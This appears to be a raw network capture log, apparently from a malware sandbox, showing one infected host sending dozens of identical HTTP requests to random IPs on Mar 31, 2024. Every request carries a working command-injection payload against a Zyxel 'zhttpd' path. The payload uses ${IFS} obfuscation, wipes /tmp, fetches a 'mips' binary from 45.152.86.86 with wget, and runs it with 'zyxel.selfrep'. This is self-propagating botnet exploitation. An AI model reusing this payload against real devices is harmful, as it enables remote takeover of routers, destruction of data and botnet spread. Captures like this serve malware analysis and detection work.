                              Mar 31, 2024 08:42:19.509557009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9344192.168.2.133692435.197.247.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509596109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9345192.168.2.1343910135.167.144.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509638071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9346192.168.2.1348832142.82.106.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509665966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9347192.168.2.1358012173.31.83.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509721041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9348192.168.2.1351470109.30.86.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509763956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9349192.168.2.1338104124.45.134.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509835958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9350192.168.2.134190436.176.106.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509877920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9351192.168.2.135520249.84.40.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509917021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9352192.168.2.1345754176.235.83.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.509977102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9353192.168.2.133462485.104.24.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510040045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9354192.168.2.134396269.35.72.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510099888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9355192.168.2.1353844118.82.95.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510129929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9356192.168.2.1356372119.172.135.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510188103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9357192.168.2.1356294104.245.219.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510241985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9358192.168.2.135030237.233.130.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510279894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9359192.168.2.1353390181.195.249.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510318995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9360192.168.2.1334490132.210.202.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510409117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9361192.168.2.13502521.71.40.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510421991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9362192.168.2.1333846126.184.119.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510462999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9363192.168.2.133680096.128.119.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510520935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9364192.168.2.1339442193.45.60.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510682106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9365192.168.2.1357840107.205.207.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510709047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9366192.168.2.1359602222.223.125.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510767937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9367192.168.2.1333384150.236.18.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510823965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9368192.168.2.133911867.126.205.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510862112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9369192.168.2.1353534152.184.150.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510921001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9370192.168.2.134323827.103.13.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510971069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9371192.168.2.133576851.83.49.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.510988951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9372192.168.2.1345936217.140.146.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.511038065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9373192.168.2.1340942153.23.91.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.511068106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9374192.168.2.1355458110.127.181.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.511105061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9375192.168.2.133346043.63.46.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.511178017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9376192.168.2.134156067.76.150.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.511209011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9377192.168.2.1355938205.18.38.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.511267900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9378192.168.2.133414669.20.27.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.511295080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9379192.168.2.1347842186.57.138.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.511343002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9380192.168.2.136024848.152.80.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.511374950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9381192.168.2.134698419.220.52.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:19.511409998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9382192.168.2.1332836212.216.164.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526169062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9383192.168.2.1359864136.173.88.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526207924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9384192.168.2.13592062.172.144.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526281118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9385192.168.2.1343600139.236.245.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526323080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9386192.168.2.135863685.133.86.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526350975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9387192.168.2.133531295.56.209.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526408911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9388192.168.2.1345996190.37.195.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526464939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9389192.168.2.133564023.245.56.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526530027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9390192.168.2.135422870.131.105.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526559114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9391192.168.2.1350116204.223.173.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526633978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9392192.168.2.134481819.93.137.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526683092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9393192.168.2.1356306222.140.80.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526736975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9394192.168.2.13567908.137.31.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526757956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9395192.168.2.1352852200.205.16.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526799917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9396192.168.2.13448165.120.167.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526855946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9397192.168.2.135119892.229.153.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526896000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9398192.168.2.1342084155.184.169.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526938915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9399192.168.2.135763660.140.170.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.526973963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9400192.168.2.134222445.234.89.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527018070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9401192.168.2.1350424169.145.94.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527086020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9402192.168.2.1338702124.218.251.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527112961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9403192.168.2.134041824.152.63.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527138948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9404192.168.2.135342441.200.194.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527187109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9405192.168.2.1360460151.72.120.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527220011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9406192.168.2.1334256199.4.243.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527261019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9407192.168.2.133573675.199.8.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527321100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9408192.168.2.133419289.233.131.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527359962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9409192.168.2.1342668140.37.199.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527391911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9410192.168.2.135760283.100.174.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527436972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9411192.168.2.135795679.189.226.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527465105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9412192.168.2.1355992164.99.138.108443
                              TimestampBytes transferredDirectionData
